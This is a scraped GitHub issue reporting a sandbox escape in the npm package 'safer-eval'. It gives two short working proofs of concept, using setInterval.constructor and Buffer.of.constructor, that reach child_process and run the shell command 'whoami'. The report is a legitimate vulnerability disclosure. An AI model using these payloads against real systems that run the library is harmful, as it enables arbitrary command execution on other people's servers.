safer-eval icon indicating copy to clipboard operation
safer-eval copied to clipboard
verified publisher icon commenthol

Sandbox Escape

Open a0xnirudh opened this issue 5 years ago • 1 comments

The following can be used to break out of the sandbox:

var saferEval = require("safer-eval");
var code = "setInterval.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString();";
console.log(saferEval(code));

Other than setInterval, one can also use clearInterval, clearTimeout and setTimeout

a0xnirudh avatar Feb 27 '20 11:02 a0xnirudh

Using Buffer:

var saferEval = require("safer-eval");
var code = "Buffer.of.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString();";
console.log(saferEval(code));

a0xnirudh avatar Feb 27 '20 13:02 a0xnirudh